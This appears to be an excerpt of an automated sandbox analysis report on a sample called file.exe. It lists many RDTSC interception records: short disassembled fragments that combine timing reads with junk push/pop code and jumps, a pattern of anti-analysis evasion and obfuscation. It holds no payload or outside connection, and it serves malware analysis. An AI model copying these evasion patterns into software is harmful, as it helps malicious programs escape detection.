                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986675 second address: 98669E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F228D5156C6h 0x0000000f jp 00007F228D5156C6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850AF second address: 9850CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228CBCA0B7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850CB second address: 985100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228D5156D7h 0x00000009 jmp 00007F228D5156D5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985100 second address: 985104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985104 second address: 985108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985678 second address: 98567C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98567C second address: 9856B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F228D5156D8h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9856B2 second address: 9856B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9857E7 second address: 9857EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985974 second address: 98597A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98597A second address: 985984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98958A second address: 989592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9892F4 second address: 9892F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA5D second address: 98CA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA62 second address: 98CA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F228D5156C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA6E second address: 98CA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA72 second address: 98CA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F228D5156C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA85 second address: 98CA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA89 second address: 98CA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA8D second address: 98CA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CBEF second address: 98CBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CBF3 second address: 98CBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F228CBCA0A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995958 second address: 99597F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F228D5156D5h 0x0000000d popad 0x0000000e pushad 0x0000000f jnp 00007F228D5156C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99597F second address: 995991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a js 00007F228CBCA0A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993ABA second address: 993ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C38 second address: 993C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C3E second address: 993C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C47 second address: 993C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C54 second address: 993C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993F25 second address: 993F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994A86 second address: 994A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994A8B second address: 994A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F228CBCA0A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B00E second address: 99B037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F228D5156CEh 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 jmp 00007F228D5156CEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EFAE second address: 99EFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E152 second address: 99E156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC71 second address: 99EC7B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F228CBCA0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC7B second address: 99EC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EA8 second address: 9A5EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EAD second address: 9A5EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EB2 second address: 9A5ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F228CBCA0A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F228CBCA0B4h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A603F second address: 9A6043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6043 second address: 9A6049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A646A second address: 9A646E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A65AB second address: 9A65B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A65B2 second address: 9A65D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228D5156D5h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6B35 second address: 9A6B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6B3E second address: 9A6B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6C39 second address: 9A6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6C42 second address: 9A6C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6C49 second address: 9A6C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F228CBCA0A6h 0x0000000a popad 0x0000000b jp 00007F228CBCA0AEh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jl 00007F228CBCA0BAh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5A13 second address: 9A5A34 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F228D5156D3h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F228D5156C6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAB4F second address: 9AAB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EEB57 second address: 8EEB67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F228D5156C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EEB67 second address: 8EEBA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F228CBCA0B2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F228CBCA0AFh 0x00000013 push ebx 0x00000014 jmp 00007F228CBCA0B6h 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF7C7 second address: 9AF7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F228D5156D4h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4B1 second address: 9AF4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F228CBCA0A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4BE second address: 9AF4C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4C4 second address: 9AF4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B53D4 second address: 9B53FD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F228D5156DDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B53FD second address: 9B5403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5403 second address: 9B5409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF28E second address: 9BF296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF3C2 second address: 9BF3CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1999 second address: 9C19A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F228CBCA0B2h 0x00000008 jl 00007F228CBCA0A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4600 second address: 9C4606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4606 second address: 9C4613 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F228CBCA0A8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3058 second address: 9D3065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA29E second address: 9DA2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2A8 second address: 9DA2B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156CAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA3EC second address: 9DA409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA409 second address: 9DA40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1336 second address: 9E133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2E98 second address: 9E2E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2FE8 second address: 9E3005 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F228CBCA0B3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0353 second address: 9F035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F035C second address: 9F0360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0360 second address: 9F038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228D5156D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F228D5156CDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FAA second address: A00FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F228CBCA0ACh 0x0000000b ja 00007F228CBCA0A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnl 00007F228CBCA0A6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FC6 second address: A00FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F228D5156C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jc 00007F228D5156CEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FDB second address: A00FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FE1 second address: A00FE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FE6 second address: A00FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FEC second address: A00FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F228D5156C6h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00CC4 second address: A00CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228CBCA0ADh 0x00000008 jmp 00007F228CBCA0B6h 0x0000000d jno 00007F228CBCA0A6h 0x00000013 jng 00007F228CBCA0A6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10620 second address: A10632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F228D5156D8h 0x0000000a jp 00007F228D5156D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10AE9 second address: A10AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10DE1 second address: A10DF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F228D5156CAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10F48 second address: A10F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A110A1 second address: A110AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11369 second address: A11374 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F228CBCA0A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12D13 second address: A12D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228D5156D7h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A157A0 second address: A157AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228CBCA0AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A157AE second address: A157B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A157B2 second address: A157BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A15989 second address: A1598F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17745 second address: A17766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F228CBCA0B9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CD02C9 second address: 4CD02D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228D5156CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CD02D9 second address: 4CD02FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F228CBCA0B8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CD02FE second address: 4CD0302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CD0302 second address: 4CD0308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CD0308 second address: 4CD0337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228D5156CCh 0x00000008 mov ah, CEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F228D5156D8h 0x00000015 rdtsc
